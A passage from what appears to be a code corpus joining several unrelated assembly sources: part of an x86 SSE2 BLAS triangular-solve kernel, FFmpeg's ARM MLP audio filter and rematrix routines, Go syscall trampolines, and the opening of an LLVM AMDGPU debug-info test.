movapd 8 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LN) || defined(RT)
movl KK, %eax
sall $0 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L132
.L131:
mulpd %xmm0, %xmm2
movapd 2 * SIZE(AA), %xmm0
addpd %xmm2, %xmm4
mulpd 2 * SIZE(BB), %xmm0
movapd 16 * SIZE(BB), %xmm2
addpd %xmm0, %xmm5
movapd 4 * SIZE(AA), %xmm0
mulpd 4 * SIZE(BB), %xmm0
addpd %xmm0, %xmm6
movapd 6 * SIZE(AA), %xmm0
mulpd 6 * SIZE(BB), %xmm0
addpd %xmm0, %xmm7
movapd 16 * SIZE(AA), %xmm0
mulpd %xmm1, %xmm3
movapd 10 * SIZE(AA), %xmm1
addpd %xmm3, %xmm4
mulpd 10 * SIZE(BB), %xmm1
movapd 24 * SIZE(BB), %xmm3
addpd %xmm1, %xmm5
movapd 12 * SIZE(AA), %xmm1
mulpd 12 * SIZE(BB), %xmm1
addpd %xmm1, %xmm6
movapd 14 * SIZE(AA), %xmm1
mulpd 14 * SIZE(BB), %xmm1
addpd %xmm1, %xmm7
movapd 24 * SIZE(AA), %xmm1
addl $16 * SIZE, AA
addl $16 * SIZE, BB
BRANCH
decl %eax
jne .L131
.L132:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 1)
BRANCH
je .L134
.L133:
movapd 0 * SIZE(AA), %xmm0
mulpd 0 * SIZE(BB), %xmm0
addpd %xmm0, %xmm4
addl $2 * SIZE, AA # aoffset += 8
addl $2 * SIZE, BB # boffset1 += 8
decl %eax
BRANCH
jg .L133
ALIGN_4
.L134:
addpd %xmm5, %xmm4
addpd %xmm7, %xmm6
addpd %xmm6, %xmm4
#if defined(LN) || defined(RT)
movl KK, %eax
#ifdef LN
subl $2, %eax
#else
subl $1, %eax
#endif
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 2), AA
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
#if defined(LN) || defined(LT)
movapd 0 * SIZE(B), %xmm0
#else
movapd 0 * SIZE(AA), %xmm0
#endif
subpd %xmm4, %xmm0
#ifdef LN
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movsd 3 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
movsd 2 * SIZE(AA), %xmm5
mulsd %xmm2, %xmm5
subsd %xmm5, %xmm0
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
unpcklpd %xmm2, %xmm0
#endif
#ifdef LT
movapd %xmm0, %xmm2
unpckhpd %xmm2, %xmm2
movsd 0 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm0
movsd 1 * SIZE(AA), %xmm5
mulsd %xmm0, %xmm5
subsd %xmm5, %xmm2
movsd 3 * SIZE(AA), %xmm4
mulsd %xmm4, %xmm2
unpcklpd %xmm2, %xmm0
#endif
#if defined(RN) || defined(RT)
movsd 0 * SIZE(B), %xmm4
movhpd 0 * SIZE(B), %xmm4
mulpd %xmm4, %xmm0
#endif
#if defined(LN) || defined(LT)
movapd %xmm0, 0 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
movhpd %xmm0, 2 * SIZE(BB)
movhpd %xmm0, 3 * SIZE(BB)
#else
movapd %xmm0, 0 * SIZE(AA)
#endif
#ifdef LN
subl $2 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
movhpd %xmm0, 1 * SIZE(%esi)
#ifndef LN
addl $2 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 2), AA
#ifdef LT
addl $2 * SIZE, B
#endif
#endif
#ifdef LN
subl $2, KK
movl BORIG, B
#endif
#ifdef LT
addl $2, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $1 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L150:
movl M, %ebx
testl $1, %ebx
jle .L159
#ifdef LN
movl K, %eax
sall $0 + BASE_SHIFT, %eax
subl %eax, AORIG
#endif
#if defined(LN) || defined(RT)
movl KK, %eax
movl AORIG, AA
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
#endif
leal BUFFER, BB
movsd 0 * SIZE(BB), %xmm2
pxor %xmm4, %xmm4
movsd 0 * SIZE(AA), %xmm0
pxor %xmm5, %xmm5
movsd 8 * SIZE(BB), %xmm3
pxor %xmm6, %xmm6
movsd 4 * SIZE(AA), %xmm1
pxor %xmm7, %xmm7
#if defined(LN) || defined(RT)
movl KK, %eax
sall $0 + BASE_SHIFT, %eax
leal (BB, %eax, 2), BB
#endif
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
sarl $3, %eax
je .L152
.L151:
mulsd %xmm0, %xmm2
movsd 1 * SIZE(AA), %xmm0
addsd %xmm2, %xmm4
mulsd 2 * SIZE(BB), %xmm0
movsd 16 * SIZE(BB), %xmm2
addsd %xmm0, %xmm4
movsd 2 * SIZE(AA), %xmm0
mulsd 4 * SIZE(BB), %xmm0
addsd %xmm0, %xmm4
movsd 3 * SIZE(AA), %xmm0
mulsd 6 * SIZE(BB), %xmm0
addsd %xmm0, %xmm4
movsd 8 * SIZE(AA), %xmm0
mulsd %xmm1, %xmm3
movsd 5 * SIZE(AA), %xmm1
addsd %xmm3, %xmm4
mulsd 10 * SIZE(BB), %xmm1
movsd 24 * SIZE(BB), %xmm3
addsd %xmm1, %xmm4
movsd 6 * SIZE(AA), %xmm1
mulsd 12 * SIZE(BB), %xmm1
addsd %xmm1, %xmm4
movsd 7 * SIZE(AA), %xmm1
mulsd 14 * SIZE(BB), %xmm1
addsd %xmm1, %xmm4
movsd 12 * SIZE(AA), %xmm1
addl $ 8 * SIZE, AA
addl $16 * SIZE, BB
BRANCH
decl %eax
jne .L151
.L152:
#if defined(LT) || defined(RN)
movl KK, %eax
#else
movl K, %eax
subl KK, %eax
#endif
andl $7, %eax # if (k & 1)
BRANCH
je .L154
.L153:
movsd 0 * SIZE(AA), %xmm0
mulsd 0 * SIZE(BB), %xmm0
addsd %xmm0, %xmm4
addl $1 * SIZE, AA # aoffset += 8
addl $2 * SIZE, BB # boffset1 += 8
decl %eax
BRANCH
jg .L153
ALIGN_4
.L154:
addsd %xmm6, %xmm4
addsd %xmm7, %xmm5
#if defined(LN) || defined(RT)
movl KK, %eax
subl $1, %eax
movl AORIG, AA
movl BORIG, B
leal BUFFER, BB
leal (, %eax, SIZE), %eax
leal (AA, %eax, 1), AA
leal (B, %eax, 1), B
leal (BB, %eax, 2), BB
#endif
#if defined(LN) || defined(LT)
movsd 0 * SIZE(B), %xmm0
#else
movsd 0 * SIZE(AA), %xmm0
#endif
subsd %xmm4, %xmm0
#if defined(LN) || defined(LT)
mulsd 0 * SIZE(AA), %xmm0
#endif
#if defined(RN) || defined(RT)
mulsd 0 * SIZE(B), %xmm0
#endif
#if defined(LN) || defined(LT)
movsd %xmm0, 0 * SIZE(B)
movsd %xmm0, 0 * SIZE(BB)
movsd %xmm0, 1 * SIZE(BB)
#else
movsd %xmm0, 0 * SIZE(AA)
#endif
#ifdef LN
subl $1 * SIZE, %esi
#endif
movsd %xmm0, 0 * SIZE(%esi)
#ifndef LN
addl $1 * SIZE, %esi
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (AA, %eax, 1), AA
#ifdef LT
addl $1 * SIZE, B
#endif
#endif
#ifdef LN
subl $1, KK
movl BORIG, B
#endif
#ifdef LT
addl $1, KK
#endif
#ifdef RT
movl K, %eax
movl BORIG, B
sall $0 + BASE_SHIFT, %eax
addl %eax, AORIG
#endif
ALIGN_2
.L159:
#ifdef LN
movl K, %eax
leal (, %eax, SIZE), %eax
leal (B, %eax, 1), B
#endif
#if defined(LT) || defined(RN)
movl K, %eax
subl KK, %eax
leal (,%eax, SIZE), %eax
leal (B, %eax, 1), B
#endif
#ifdef RN
addl $1, KK
#endif
#ifdef RT
subl $1, KK
#endif
ALIGN_2
.L999:
movl OLD_STACK, %esp
EMMS
popl %ebx
popl %esi
popl %edi
popl %ebp
ret
ALIGN_2
EPILOGUE
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2014 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#define MAX_CHANNELS 8
#define MAX_FIR_ORDER 8
#define MAX_IIR_ORDER 4
#define MAX_RATEFACTOR 4
#define MAX_BLOCKSIZE (40 * MAX_RATEFACTOR)
PST .req a1
PCO .req a2
AC0 .req a3
AC1 .req a4
CO0 .req v1
CO1 .req v2
CO2 .req v3
CO3 .req v4
ST0 .req v5
ST1 .req v6
ST2 .req sl
ST3 .req fp
I .req ip
PSAMP .req lr
.macro branch_pic_label first, remainder:vararg
A .word \first - 4
T .hword (\first) / 2
.ifnb \remainder
branch_pic_label \remainder
.endif
.endm
// Some macros that do loads/multiplies where the register number is determined
// from an assembly-time expression. Boy is GNU assembler's syntax ugly...
.macro load group, index, base, offset
.altmacro
load_ \group, %(\index), \base, \offset
.noaltmacro
.endm
.macro load_ group, index, base, offset
ldr \group\index, [\base, #\offset]
.endm
.macro loadd group, index, base, offset
.altmacro
loadd_ \group, %(\index), %(\index+1), \base, \offset
.noaltmacro
.endm
.macro loadd_ group, index0, index1, base, offset
A .if \offset >= 256
A ldr \group\index0, [\base, #\offset]
A ldr \group\index1, [\base, #(\offset) + 4]
A .else
ldrd \group\index0, \group\index1, [\base, #\offset]
A .endif
.endm
.macro multiply index, accumulate, long
.altmacro
multiply_ %(\index), \accumulate, \long
.noaltmacro
.endm
.macro multiply_ index, accumulate, long
.if \long
.if \accumulate
smlal AC0, AC1, CO\index, ST\index
.else
smull AC0, AC1, CO\index, ST\index
.endif
.else
.if \accumulate
mla AC0, CO\index, ST\index, AC0
.else
mul AC0, CO\index, ST\index
.endif
.endif
.endm
// A macro to update the load register number and load offsets
.macro inc howmany
.set LOAD_REG, (LOAD_REG + \howmany) & 3
.set OFFSET_CO, OFFSET_CO + 4 * \howmany
.set OFFSET_ST, OFFSET_ST + 4 * \howmany
.if FIR_REMAIN > 0
.set FIR_REMAIN, FIR_REMAIN - \howmany
.if FIR_REMAIN == 0
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.endif
.elseif IIR_REMAIN > 0
.set IIR_REMAIN, IIR_REMAIN - \howmany
.endif
.endm
// Macro to implement the inner loop for one specific combination of parameters
.macro implement_filter mask_minus1, shift_0, shift_8, iir_taps, fir_taps
.set TOTAL_TAPS, \iir_taps + \fir_taps
// Deal with register allocation...
.set DEFINED_SHIFT, 0
.set DEFINED_MASK, 0
.set SHUFFLE_SHIFT, 0
.set SHUFFLE_MASK, 0
.set SPILL_SHIFT, 0
.set SPILL_MASK, 0
.if TOTAL_TAPS == 0
// Little register pressure in this case - just keep MASK where it was
.if !\mask_minus1
MASK .req ST1
.set DEFINED_MASK, 1
.endif
.else
.if \shift_0
.if !\mask_minus1
// AC1 is unused with shift 0
MASK .req AC1
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif \shift_8
.if !\mask_minus1
.if TOTAL_TAPS <= 4
// All coefficients are preloaded (so pointer not needed)
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.else
.set SPILL_MASK, 1
.endif
.endif
.else // shift not 0 or 8
.if TOTAL_TAPS <= 3
// All coefficients are preloaded, and at least one CO register is unused
.if \fir_taps & 1
SHIFT .req CO0
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.else
SHIFT .req CO3
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.endif
.if !\mask_minus1
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif TOTAL_TAPS == 4
// All coefficients are preloaded
SHIFT .req PCO
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.else
.set SPILL_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.endif
.endif
.endif
.if SPILL_SHIFT
SHIFT .req ST0
.set DEFINED_SHIFT, 1
.endif
.if SPILL_MASK
MASK .req ST1
.set DEFINED_MASK, 1
.endif
// Preload coefficients if possible
.if TOTAL_TAPS <= 4
.set OFFSET_CO, 0
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.rept \fir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.rept \iir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.endif
// Move mask/shift to final positions if necessary
// Need to do this after preloading, because in some cases we
// reuse the coefficient pointer register
.if SHUFFLE_SHIFT
mov SHIFT, ST0
.endif
.if SHUFFLE_MASK
mov MASK, ST1
.endif
// Begin loop
01:
.if TOTAL_TAPS == 0
// Things simplify a lot in this case
// In fact this could be pipelined further if it's worth it...
ldr ST0, [PSAMP]
subs I, I, #1
.if !\mask_minus1
and ST0, ST0, MASK
.endif
str ST0, [PST, #-4]!
str ST0, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)]
str ST0, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.else
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.set LOAD_BANK, 0
.set FIR_REMAIN, \fir_taps
.set IIR_REMAIN, \iir_taps
.if FIR_REMAIN == 0 // only IIR terms
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.else
.set OFFSET_CO, 0
.set OFFSET_ST, 0
.endif
.set MUL_REG, LOAD_REG
.set COUNTER, 0
.rept TOTAL_TAPS + 2
// Do load(s)
.if FIR_REMAIN != 0 || IIR_REMAIN != 0
.if COUNTER == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif COUNTER == 1 && (\fir_taps & 1) == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif LOAD_BANK == 0
.if TOTAL_TAPS > 4
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load CO, LOAD_REG, PCO, OFFSET_CO
.else
loadd CO, LOAD_REG, PCO, OFFSET_CO
.endif
.endif
.set LOAD_BANK, 1
.else
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.else
loadd ST, LOAD_REG, PST, OFFSET_ST
inc 2
.endif
.set LOAD_BANK, 0
.endif
.endif
// Do interleaved multiplies, slightly delayed
.if COUNTER >= 2
multiply MUL_REG, COUNTER > 2, !\shift_0
.set MUL_REG, (MUL_REG + 1) & 3
.endif
.set COUNTER, COUNTER + 1
.endr
// Post-process the result of the multiplies
.if SPILL_SHIFT
ldr SHIFT, [sp, #9*4 + 0*4]
.endif
.if SPILL_MASK
ldr MASK, [sp, #9*4 + 1*4]
.endif
ldr ST2, [PSAMP]
subs I, I, #1
.if \shift_8
mov AC0, AC0, lsr #8
orr AC0, AC0, AC1, lsl #24
.elseif !\shift_0
rsb ST3, SHIFT, #32
mov AC0, AC0, lsr SHIFT
A orr AC0, AC0, AC1, lsl ST3
T mov AC1, AC1, lsl ST3
T orr AC0, AC0, AC1
.endif
.if \mask_minus1
add ST3, ST2, AC0
.else
add ST2, ST2, AC0
and ST3, ST2, MASK
sub ST2, ST3, AC0
.endif
str ST3, [PST, #-4]!
str ST2, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)]
str ST3, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.endif
b 99f
.if DEFINED_SHIFT
.unreq SHIFT
.endif
.if DEFINED_MASK
.unreq MASK
.endif
.endm
.macro switch_on_fir_taps mask_minus1, shift_0, shift_8, iir_taps
A ldr CO0, [pc, a3, lsl #2] // firorder is in range 0-(8-iir_taps)
A add pc, pc, CO0
T tbh [pc, a3, lsl #1]
0:
branch_pic_label (70f - 0b), (71f - 0b), (72f - 0b), (73f - 0b)
branch_pic_label (74f - 0b)
.if \iir_taps <= 3
branch_pic_label (75f - 0b)
.if \iir_taps <= 2
branch_pic_label (76f - 0b)
.if \iir_taps <= 1
branch_pic_label (77f - 0b)
.if \iir_taps == 0
branch_pic_label (78f - 0b)
.endif
.endif
.endif
.endif
70: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 0
71: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 1
72: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 2
73: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 3
74: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 4
.if \iir_taps <= 3
75: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 5
.if \iir_taps <= 2
76: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 6
.if \iir_taps <= 1
77: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 7
.if \iir_taps == 0
78: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 8
.endif
.endif
.endif
.endif
.endm
.macro switch_on_iir_taps mask_minus1, shift_0, shift_8
A ldr CO0, [pc, a4, lsl #2] // irorder is in range 0-4
A add pc, pc, CO0
T tbh [pc, a4, lsl #1]
0:
branch_pic_label (60f - 0b), (61f - 0b), (62f - 0b), (63f - 0b)
branch_pic_label (64f - 0b)
60: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 0
61: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 1
62: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 2
63: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 3
64: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 4
.endm
/* void ff_mlp_filter_channel_arm(int32_t *state, const int32_t *coeff,
* int firorder, int iirorder,
* unsigned int filter_shift, int32_t mask,
* int blocksize, int32_t *sample_buffer);
*/
function ff_mlp_filter_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {ST0,ST1,I,PSAMP}
cmp ST1, #-1
bne 30f
movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
bne 20f
bcs 10f
switch_on_iir_taps 1, 1, 0
10: switch_on_iir_taps 1, 0, 1
20: switch_on_iir_taps 1, 0, 0
30: movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
bne 50f
bcs 40f
switch_on_iir_taps 0, 1, 0
40: switch_on_iir_taps 0, 0, 1
50: switch_on_iir_taps 0, 0, 0
99: pop {v1-fp,pc}
endfunc
.unreq PST
.unreq PCO
.unreq AC0
.unreq AC1
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq ST0
.unreq ST1
.unreq ST2
.unreq ST3
.unreq I
.unreq PSAMP
/********************************************************************/
PSA .req a1 // samples
PCO .req a2 // coeffs
PBL .req a3 // bypassed_lsbs
INDEX .req a4
CO0 .req v1
CO1 .req v2
CO2 .req v3
CO3 .req v4
SA0 .req v5
SA1 .req v6
SA2 .req sl
SA3 .req fp
AC0 .req ip
AC1 .req lr
NOISE .req SA0
LSB .req SA1
DCH .req SA2 // dest_ch
MASK .req SA3
// INDEX is used as follows:
// bits 0..6 index2 (values up to 17, but wider so that we can
// add to index field without needing to mask)
// bits 7..14 i (values up to 160)
// bit 15 underflow detect for i
// bits 25..31 (if access_unit_size_pow2 == 128) \ index
// bits 26..31 (if access_unit_size_pow2 == 64) /
.macro implement_rematrix shift, index_mask, mask_minus1, maxchan
.if \maxchan == 1
// We can just leave the coefficients in registers in this case
ldrd CO0, CO1, [PCO]
.endif
1:
.if \maxchan == 1
ldrd SA0, SA1, [PSA]
smull AC0, AC1, CO0, SA0
.elseif \maxchan == 5
ldr CO0, [PCO, #0]
ldr SA0, [PSA, #0]
ldr CO1, [PCO, #4]
ldr SA1, [PSA, #4]
ldrd CO2, CO3, [PCO, #8]
smull AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #8]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #16]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #16]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.else // \maxchan == 7
ldr CO2, [PCO, #0]
ldr SA2, [PSA, #0]
ldr CO3, [PCO, #4]
ldr SA3, [PSA, #4]
ldrd CO0, CO1, [PCO, #8]
smull AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #8]
smlal AC0, AC1, CO3, SA3
ldrd CO2, CO3, [PCO, #16]
smlal AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #16]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #24]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #24]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.endif
ldm sp, {NOISE, DCH, MASK}
smlal AC0, AC1, CO1, SA1
.if \shift != 0
.if \index_mask == 63
add NOISE, NOISE, INDEX, lsr #32-6
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-6
.else // \index_mask == 127
add NOISE, NOISE, INDEX, lsr #32-7
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-7
.endif
sub INDEX, INDEX, #1<<7
adds AC0, AC0, NOISE, lsl #\shift + 7
adc AC1, AC1, NOISE, asr #31
.else
ldrb LSB, [PBL], #MAX_CHANNELS
sub INDEX, INDEX, #1<<7
.endif
add PSA, PSA, #MAX_CHANNELS*4
mov AC0, AC0, lsr #14
orr AC0, AC0, AC1, lsl #18
.if !\mask_minus1
and AC0, AC0, MASK
.endif
add AC0, AC0, LSB
tst INDEX, #1<<15
str AC0, [PSA, DCH, lsl #2] // DCH is precompensated for the early increment of PSA
beq 1b
b 98f
.endm
.macro switch_on_maxchan shift, index_mask, mask_minus1
cmp v4, #5
blo 51f
beq 50f
implement_rematrix \shift, \index_mask, \mask_minus1, 7
50: implement_rematrix \shift, \index_mask, \mask_minus1, 5
51: implement_rematrix \shift, \index_mask, \mask_minus1, 1
.endm
.macro switch_on_mask shift, index_mask
cmp sl, #-1
bne 40f
switch_on_maxchan \shift, \index_mask, 1
40: switch_on_maxchan \shift, \index_mask, 0
.endm
.macro switch_on_au_size shift
.if \shift == 0
switch_on_mask \shift, undefined
.else
teq v6, #64
bne 30f
orr INDEX, INDEX, v1, lsl #32-6
switch_on_mask \shift, 63
30: orr INDEX, INDEX, v1, lsl #32-7
switch_on_mask \shift, 127
.endif
.endm
/* void ff_mlp_rematrix_channel_arm(int32_t *samples,
* const int32_t *coeffs,
* const uint8_t *bypassed_lsbs,
* const int8_t *noise_buffer,
* int index,
* unsigned int dest_ch,
* uint16_t blockpos,
* unsigned int maxchan,
* int matrix_noise_shift,
* int access_unit_size_pow2,
* int32_t mask);
*/
function ff_mlp_rematrix_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {v1-sl}
teq v4, #1
itt ne
teqne v4, #5
teqne v4, #7
bne 99f
teq v6, #64
it ne
teqne v6, #128
bne 99f
sub v2, v2, #MAX_CHANNELS
push {a4,v2,sl} // initialise NOISE,DCH,MASK; make sp dword-aligned
movs INDEX, v3, lsl #7
beq 98f // just in case, do nothing if blockpos = 0
subs INDEX, INDEX, #1<<7 // offset by 1 so we borrow at the right time
adc lr, v1, v1 // calculate index2 (C was set by preceding subs)
orr INDEX, INDEX, lr
// Switch on matrix_noise_shift: values 0 and 1 are
// disproportionately common so do those in a form the branch
// predictor can accelerate. Values can only go up to 15.
cmp v5, #1
beq 11f
blo 10f
A ldr v5, [pc, v5, lsl #2]
A add pc, pc, v5
T tbh [pc, v5, lsl #1]
0:
branch_pic_label 0, 0, (12f - 0b), (13f - 0b)
branch_pic_label (14f - 0b), (15f - 0b), (16f - 0b), (17f - 0b)
branch_pic_label (18f - 0b), (19f - 0b), (20f - 0b), (21f - 0b)
branch_pic_label (22f - 0b), (23f - 0b), (24f - 0b), (25f - 0b)
10: switch_on_au_size 0
11: switch_on_au_size 1
12: switch_on_au_size 2
13: switch_on_au_size 3
14: switch_on_au_size 4
15: switch_on_au_size 5
16: switch_on_au_size 6
17: switch_on_au_size 7
18: switch_on_au_size 8
19: switch_on_au_size 9
20: switch_on_au_size 10
21: switch_on_au_size 11
22: switch_on_au_size 12
23: switch_on_au_size 13
24: switch_on_au_size 14
25: switch_on_au_size 15
98: add sp, sp, #3*4
pop {v1-fp,pc}
99: // Can't handle these parameters, drop back to C
pop {v1-fp,lr}
b X(ff_mlp_rematrix_channel)
endfunc
.unreq PSA
.unreq PCO
.unreq PBL
.unreq INDEX
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq SA0
.unreq SA1
.unreq SA2
.unreq SA3
.unreq AC0
.unreq AC1
.unreq NOISE
.unreq LSB
.unreq DCH
.unreq MASK
| {
"language": "Assembly"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for amd64, Solaris are implemented in runtime/syscall_solaris.go
//
TEXT ·sysvicall6(SB),NOSPLIT,$0-88
JMP syscall·sysvicall6(SB)
TEXT ·rawSysvicall6(SB),NOSPLIT,$0-88
JMP syscall·rawSysvicall6(SB)
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System calls for 386, Linux
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
TEXT ·socketcall(SB),NOSPLIT,$0-36
JMP syscall·socketcall(SB)
TEXT ·rawsocketcall(SB),NOSPLIT,$0-36
JMP syscall·rawsocketcall(SB)
TEXT ·seek(SB),NOSPLIT,$0-28
JMP syscall·seek(SB)
| {
"language": "Assembly"
} |
; RUN: llc -O0 -mtriple=amdgcn-amd-amdhsa -mcpu=fiji -verify-machineinstrs -filetype=obj < %s | llvm-dwarfdump -v -debug-info - | FileCheck %s
; LLVM IR generated with the following command and OpenCL source:
;
; $clang -cl-std=CL2.0 -g -O0 -target amdgcn-amd-amdhsa -S -emit-llvm <path-to-file>
;
; global int GlobA;
; global int GlobB;
;
; kernel void kernel1(unsigned int ArgN, global int *ArgA, global int *ArgB) {
; ArgA[ArgN] += ArgB[ArgN];
; }
declare void @llvm.dbg.declare(metadata, metadata, metadata)
; CHECK: {{.*}}DW_TAG_variable
; CHECK-NEXT: DW_AT_name {{.*}}"GlobA"
; CHECK-NEXT: DW_AT_type
; CHECK-NEXT: DW_AT_external
; CHECK-NEXT: DW_AT_decl_file
; CHECK-NEXT: DW_AT_decl_line
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_addr 0x0)
@GlobA = common addrspace(1) global i32 0, align 4, !dbg !0
; CHECK: {{.*}}DW_TAG_variable
; CHECK-NEXT: DW_AT_name {{.*}}"GlobB"
; CHECK-NEXT: DW_AT_type
; CHECK-NEXT: DW_AT_external
; CHECK-NEXT: DW_AT_decl_file
; CHECK-NEXT: DW_AT_decl_line
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_addr 0x0)
@GlobB = common addrspace(1) global i32 0, align 4, !dbg !6
define amdgpu_kernel void @kernel1(
; CHECK: {{.*}}DW_TAG_formal_parameter
; CHECK-NEXT: DW_AT_location [DW_FORM_block1] (DW_OP_fbreg +4, DW_OP_constu 0x1, DW_OP_swap, DW_OP_xderef)
; CHECK-NEXT: DW_AT_name {{.*}}"ArgN"
i32 %ArgN,
